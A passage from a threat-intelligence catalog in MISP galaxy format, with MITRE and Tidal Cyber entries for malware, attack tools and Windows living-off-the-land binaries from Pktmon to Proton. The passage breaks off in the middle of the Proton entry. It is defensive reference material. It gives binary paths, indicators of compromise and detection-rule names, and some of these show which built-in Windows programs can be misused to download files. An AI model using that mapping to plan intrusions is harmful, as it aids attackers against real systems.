Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network'] |
software_attack_id | S1123 |
source | MITRE |
type | ['malware'] |
Pktmon
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Captures network packets on Windows 10 with the October 2018 Update or later.
Author: Derek Johnson
Paths:
* c:\windows\system32\pktmon.exe
* c:\windows\syswow64\pktmon.exe
Resources:
* https://binar-x79.com/windows-10-secret-sniffer/
Detection:
* Sigma: proc_creation_win_lolbin_pktmon.yml
* IOC: .etl files found on system[Pktmon.exe - LOLBAS Project]
Internal MISP references
UUID 0b0ae21a-987c-44c5-93db-3b228544eb99
which can be used as unique global reference for Pktmon
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5139 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
PLAINTEE
PLAINTEE is a malware sample that has been used by Rancor in targeted attacks in Singapore and Cambodia. [Rancor Unit42 June 2018]
Internal MISP references
UUID 9445f18a-a796-447a-a35f-94a9fb72411c
which can be used as unique global reference for PLAINTEE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0254 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Play Ransomware
Play is a ransomware operation first observed in July 2022. Security researchers have observed filename, filepath, and TTP overlaps between Play and the Hive and Nokoyawa ransomware families, which are themselves believed to be linked.[Trend Micro Play Playbook September 06 2022] According to publicly available ransomware extortion threat data, Play has claimed nearly 200 victims from a wide range of sectors on its data leak site since December 2022.[GitHub ransomwatch]
Internal MISP references
UUID aeafc9f4-e3b4-42ec-a156-4a05f1aa5ea3
which can be used as unique global reference for Play Ransomware
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5300 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '562e535e-19f5-4d6c-81ed-ce2aec544f09', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PLEAD
PLEAD is a remote access tool (RAT) and downloader used by BlackTech in targeted attacks in East Asia including Taiwan, Japan, and Hong Kong.[TrendMicro BlackTech June 2017][JPCert PLEAD Downloader June 2018] PLEAD has also been referred to as TSCookie, though more recent reporting indicates likely separation between the two. PLEAD was observed in use as early as March 2017.[JPCert TSCookie March 2018][JPCert PLEAD Downloader June 2018]
Internal MISP references
UUID 9a890a85-afbe-4c35-a3e7-1adad481bdf7
which can be used as unique global reference for PLEAD
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0435 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Plink
Plink is a tool used to automate Secure Shell (SSH) actions on Windows.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 6117e2b5-140b-49d2-89b7-76d91e6c798c
which can be used as unique global reference for Plink
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5041 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'febea5b6-2ea2-402b-8bec-f3f5b3f73c59', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'a1427c89-2ebd-440f-b7e0-9728e3ef2096', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
PlugX
PlugX is a remote access tool (RAT) with modular plugins that has been used by multiple threat groups.[Lastline PlugX Analysis][FireEye Clandestine Fox Part 2][New DragonOK][Dell TG-3390]
Internal MISP references
UUID 070b56f4-7810-4dad-b85f-bdfce9c08c10
which can be used as unique global reference for PlugX
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0013 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
pngdowner
pngdowner is malware used by Putter Panda. It is a simple tool with limited functionality and no persistence mechanism, suggesting it is used only as a simple "download-and-execute" utility. [CrowdStrike Putter Panda]
Internal MISP references
UUID 95c273d2-3081-4cb5-8d41-37eb4e90264d
which can be used as unique global reference for pngdowner
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0067 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pnputil
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used for installing drivers
Author: Hai vaknin (lux)
Paths:
* C:\Windows\system32\pnputil.exe
Resources: None Provided
Detection:
* Sigma: proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml[Pnputil.exe - LOLBAS Project]
Internal MISP references
UUID dd1e8b57-4900-4823-b194-1526c1e00099
which can be used as unique global reference for Pnputil
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5140 |
source | Tidal Cyber |
tags | ['6d924d43-5de3-45de-8466-a8c47a5b9e68', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
PoetRAT
PoetRAT is a remote access trojan (RAT) that was first identified in April 2020. PoetRAT has been used in multiple campaigns against the private and public sectors in Azerbaijan, including ICS and SCADA systems in the energy sector. The STIBNITE activity group has been observed using the malware. PoetRAT derived its name from references in the code to poet William Shakespeare. [Talos PoetRAT April 2020][Talos PoetRAT October 2020][Dragos Threat Report 2020]
Internal MISP references
UUID 79b4f277-3b18-4aa7-9f96-44b35b23166b
which can be used as unique global reference for PoetRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0428 |
source | MITRE |
type | ['malware'] |
PoisonIvy
PoisonIvy is a popular remote access tool (RAT) that has been used by many groups.[FireEye Poison Ivy][Symantec Elderwood Sept 2012][Symantec Darkmoon Aug 2005]
Internal MISP references
UUID 1d87a695-7989-49ae-ac1a-b6601db565c3
which can be used as unique global reference for PoisonIvy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0012 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PolyglotDuke
PolyglotDuke is a downloader that has been used by APT29 since at least 2013. PolyglotDuke has been used to drop MiniDuke.[ESET Dukes October 2019]
Internal MISP references
UUID 3b7179fa-7b8b-4068-b224-d8d9c642964d
which can be used as unique global reference for PolyglotDuke
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0518 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pony
Pony is credential-stealing malware, though it has also been used by adversaries for its downloader capabilities. The source code for Pony Loader 1.0 and 2.0 was leaked online, leading to its use by various threat actors.[Malwarebytes Pony April 2016]
Internal MISP references
UUID 555b612e-3f0d-421d-b2a7-63eb2d1ece5f
which can be used as unique global reference for Pony
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0453 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
POORAIM
POORAIM is a backdoor used by APT37 in campaigns since at least 2014. [FireEye APT37 Feb 2018]
Internal MISP references
UUID 1353d695-5bae-4593-988f-9bd07a6fd1bb
which can be used as unique global reference for POORAIM
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0216 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PoshC2
PoshC2 is an open source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in PowerShell. Although PoshC2 is primarily focused on Windows implantation, it does contain a basic Python dropper for Linux/macOS.[GitHub PoshC2]
Internal MISP references
UUID a3a03835-79bf-4558-8e80-7983aeb842fb
which can be used as unique global reference for PoshC2
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0378 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
POSHSPY
POSHSPY is a backdoor that has been used by APT29 since at least 2015. It appears to serve as a secondary backdoor, used if the actors lose access to their primary backdoors. [FireEye POSHSPY April 2017]
Internal MISP references
UUID b92f28c4-cbc8-4721-ac79-2d8bdf5247e5
which can be used as unique global reference for POSHSPY
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0150 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PowerDuke
PowerDuke is a backdoor that was used by APT29 in 2016. It has primarily been delivered through Microsoft Word or Excel attachments containing malicious macros. [Volexity PowerDuke November 2016]
Internal MISP references
UUID d9e4f4a1-dd41-424e-986a-b9a39ebea805
which can be used as unique global reference for PowerDuke
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0139 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PowerLess
PowerLess is a PowerShell-based modular backdoor that has been used by Magic Hound since at least 2022.[Cybereason PowerLess February 2022]
Internal MISP references
UUID 8b9159c1-db48-472b-9897-34325da5dca7
which can be used as unique global reference for PowerLess
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1012 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Power Loader
Power Loader is modular code sold in the cybercrime market used as a downloader in malware families such as Carberp, Redyms and Gapz. [MalwareTech Power Loader Aug 2013] [WeLiveSecurity Gapz and Redyms Mar 2013]
Internal MISP references
UUID 018ee1d9-35af-49dc-a667-11b77cd76f46
which can be used as unique global reference for Power Loader
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0177 |
source | MITRE |
type | ['malware'] |
Powerpnt
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Office binary.
Author: Reegun J (OCBC Bank)
Paths:
* C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe
* C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Powerpnt.exe
* C:\Program Files (x86)\Microsoft Office\Office16\Powerpnt.exe
* C:\Program Files\Microsoft Office\Office16\Powerpnt.exe
* C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Powerpnt.exe
* C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Powerpnt.exe
* C:\Program Files (x86)\Microsoft Office\Office15\Powerpnt.exe
* C:\Program Files\Microsoft Office\Office15\Powerpnt.exe
* C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Powerpnt.exe
* C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Powerpnt.exe
* C:\Program Files (x86)\Microsoft Office\Office14\Powerpnt.exe
* C:\Program Files\Microsoft Office\Office14\Powerpnt.exe
* C:\Program Files (x86)\Microsoft Office\Office12\Powerpnt.exe
* C:\Program Files\Microsoft Office\Office12\Powerpnt.exe
Resources:
* https://twitter.com/reegun21/status/1150032506504151040
* https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
Detection:
* Sigma: proc_creation_win_lolbin_office.yml
* IOC: Suspicious Office application Internet/network traffic[Powerpnt.exe - LOLBAS Project]
Internal MISP references
UUID 155053be-8a2c-4d5e-8206-36d992c5651d
which can be used as unique global reference for Powerpnt
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5231 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
PowerPunch
PowerPunch is a lightweight downloader that has been used by Gamaredon Group since at least 2021.[Microsoft Actinium February 2022]
Internal MISP references
UUID e7cdaf70-5e28-442a-b34d-894484788dc5
which can be used as unique global reference for PowerPunch
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0685 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PowerShower
PowerShower is a PowerShell backdoor used by Inception for initial reconnaissance and to download and execute second stage payloads.[Unit 42 Inception November 2018][Kaspersky Cloud Atlas August 2019]
Internal MISP references
UUID 2ca245de-77a9-4857-ba93-fd0d6988df9d
which can be used as unique global reference for PowerShower
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0441 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
POWERSOURCE
POWERSOURCE is a PowerShell backdoor that is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. It was observed in February 2017 in spearphishing campaigns against personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations. The malware was delivered when macros were enabled by the victim and a VBS script was dropped. [FireEye FIN7 March 2017] [Cisco DNSMessenger March 2017]
Internal MISP references
UUID a4700431-6578-489f-9782-52e394277296
which can be used as unique global reference for POWERSOURCE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0145 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PowerSploit
PowerSploit is an open source, offensive security framework composed of PowerShell modules and scripts that perform a wide range of tasks related to penetration testing, such as code execution, persistence, bypassing anti-virus, reconnaissance, and exfiltration. [GitHub PowerSploit May 2012] [PowerShellMagazine PowerSploit July 2014] [PowerSploit Documentation]
Internal MISP references
UUID 82fad10d-c921-4a87-a533-49def83d002b
which can be used as unique global reference for PowerSploit
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0194 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'e81ba503-60b0-4b64-8f20-ef93e7783796'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
PowerStallion
PowerStallion is a lightweight PowerShell backdoor used by Turla, possibly as a recovery access tool to install other backdoors.[ESET Turla PowerShell May 2019]
Internal MISP references
UUID 837bcf97-37a7-4001-a466-306574fd7890
which can be used as unique global reference for PowerStallion
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0393 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
POWERSTATS
POWERSTATS is a PowerShell-based first stage backdoor used by MuddyWater. [Unit 42 MuddyWater Nov 2017]
Internal MISP references
UUID 39fc59c6-f1aa-4c93-8e43-1f41563e9d9e
which can be used as unique global reference for POWERSTATS
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0223 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
POWERTON
POWERTON is a custom PowerShell backdoor first observed in 2018. It has typically been deployed as a late-stage backdoor by APT33. At least two variants of the backdoor have been identified, with the later version containing improved functionality.[FireEye APT33 Guardrail]
Internal MISP references
UUID b3c28750-3825-4e4d-ab92-f39a6b0827dd
which can be used as unique global reference for POWERTON
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0371 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PowerTool
PowerTool is a tool used to remove rootkits, as well as to detect, analyze, and fix kernel structure modifications.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID b8a101e4-e0d2-4002-94c6-18ea30da7aa7
which can be used as unique global reference for PowerTool
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5039 |
source | Tidal Cyber |
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'd819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
POWERTRASH
A PowerShell-based, in-memory loader that executes embedded payloads.[Mandiant FIN7 April 4 2022] According to Mandiant, POWERTRASH is a "uniquely obfuscated" version of PowerSploit's Invoke-Shellcode.ps1 shellcode invoker module known to be used by FIN7.[GitHub - PowerSploit Invoke-Shellcode]
Internal MISP references
UUID 3192d79f-2a24-4461-b4c8-4b40ef7c163f
which can be used as unique global reference for POWERTRASH
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5294 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '84615fe0-c2a5-4e07-8957-78ebc29b4635', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PowGoop
PowGoop is a loader that consists of a DLL loader and a PowerShell-based downloader; it has been used by MuddyWater as their main loader.[DHS CISA AA22-055A MuddyWater February 2022][CYBERCOM Iranian Intel Cyber January 2022]
Internal MISP references
UUID 7ed984bb-d098-4d0a-90fd-b03e68842479
which can be used as unique global reference for PowGoop
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1046 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
POWRUNER
POWRUNER is a PowerShell script that sends and receives commands to and from the C2 server. [FireEye APT34 Dec 2017]
Internal MISP references
UUID 67cdb7a6-5142-43fa-8b8d-d9bdd2a4dae4
which can be used as unique global reference for POWRUNER
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0184 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Presentationhost
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: File is used for executing Browser applications
Author: Oddvar Moe
Paths:
* C:\Windows\System32\Presentationhost.exe
* C:\Windows\SysWOW64\Presentationhost.exe
Resources:
* https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
Detection:
* Sigma: proc_creation_win_lolbin_presentationhost_download.yml
* Sigma: proc_creation_win_lolbin_presentationhost.yml
* IOC: Execution of .xbap files may not be common on production workstations[Presentationhost.exe - LOLBAS Project]
Internal MISP references
UUID 8127f51d-dce0-405a-a785-83883ba19c23
which can be used as unique global reference for Presentationhost
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5141 |
source | Tidal Cyber |
tags | ['0661bf1f-76ec-490c-937a-efa3f02bc59b', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Prestige
Prestige ransomware has been used by Sandworm Team since at least March 2022, including against transportation and related logistics industries in Ukraine and Poland in October 2022.[Microsoft Prestige ransomware October 2022]
Internal MISP references
UUID 4fb5b109-5a5c-5441-a0f9-f639ead5405e
which can be used as unique global reference for Prestige
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1058 |
source | MITRE |
tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Prikormka
Prikormka is a malware family used in a campaign known as Operation Groundbait. It has predominantly been observed in Ukraine and was used as early as 2008. [ESET Operation Groundbait]
Internal MISP references
UUID 1da989a8-41cc-4e89-a435-a88acb72ae0d
which can be used as unique global reference for Prikormka
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0113 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Print
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows to send files to the printer
Author: Oddvar Moe
Paths:
* C:\Windows\System32\print.exe
* C:\Windows\SysWOW64\print.exe
Resources:
* https://twitter.com/Oddvarmoe/status/985518877076541440
* https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410
Detection:
* Sigma: proc_creation_win_print_remote_file_copy.yml
* IOC: Print.exe retrieving files from internet
* IOC: Print.exe creating executable files on disk
[Print.exe - LOLBAS Project]
Internal MISP references
UUID 8ad4945d-6c54-4472-a476-906a9860fb82
which can be used as unique global reference for Print
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5142 |
source | Tidal Cyber |
tags | ['01aca077-8cfb-4d1d-9b83-3678cd26f050', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
PrintBrm
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Printer Migration Command-Line Tool
Author: Elliot Killick
Paths:
* C:\Windows\System32\spool\tools\PrintBrm.exe
Resources:
* https://twitter.com/elliotkillick/status/1404117015447670800
Detection:
* Sigma: proc_creation_win_lolbin_printbrm.yml
* IOC: PrintBrm.exe should not be run on a normal workstation
[PrintBrm.exe - LOLBAS Project]
Internal MISP references
UUID 93ec2323-f93b-4d21-9930-f367948187f0
which can be used as unique global reference for PrintBrm
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5143 |
source | Tidal Cyber |
tags | ['37a70ca8-a027-458c-9a48-7e0d307462be', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
ProcDump
ProcDump is a tool used to monitor applications for CPU spikes and generate crash dumps.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 0d6e00a3-6237-458a-85e5-1128bd7f4f50
which can be used as unique global reference for ProcDump
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5036 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'c3eaf8a7-06e5-4e3a-9615-36316d9e10a8', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Process Hacker
Process Hacker is a tool used to remove rootkits.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID d390ea7d-0995-4069-924d-65d6c7c98e3c
which can be used as unique global reference for Process Hacker
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5040 |
source | Tidal Cyber |
tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
ProLock
ProLock is a ransomware strain that has been used in Big Game Hunting (BGH) operations since at least 2020, often obtaining initial access with QakBot. ProLock is the successor to PwndLocker ransomware, which was found to contain a bug allowing decryption without ransom payment in 2019.[Group IB Ransomware September 2020]
Internal MISP references
UUID c8af096e-c71e-4751-b203-70c285b7a7bd
which can be used as unique global reference for ProLock
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0654 |
source | MITRE |
tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
ProtocolHandler
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Office binary
Author: Nir Chako
Paths:
* C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\ProtocolHandler.exe
* C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\ProtocolHandler.exe
* C:\Program Files (x86)\Microsoft Office\Office16\ProtocolHandler.exe
* C:\Program Files\Microsoft Office\Office16\ProtocolHandler.exe
* C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\ProtocolHandler.exe
* C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\ProtocolHandler.exe
* C:\Program Files (x86)\Microsoft Office\Office15\ProtocolHandler.exe
* C:\Program Files\Microsoft Office\Office15\ProtocolHandler.exe
Resources: None Provided
Detection:
* Sigma: proc_creation_win_lolbin_protocolhandler_download.yml
* IOC: Suspicious Office application Internet/network traffic
[ProtocolHandler.exe - LOLBAS Project]
Internal MISP references
UUID 2ecf8041-8069-41a0-b6e8-5b328ae69e31
which can be used as unique global reference for ProtocolHandler
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5232 |
source | Tidal Cyber |
tags | ['77131d00-b8b2-42ef-afbd-1fbfc12729df', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Proton
Proton is a macOS backdoor focusing on data theft and credential access [objsee mac malware 2017].
Internal MISP references
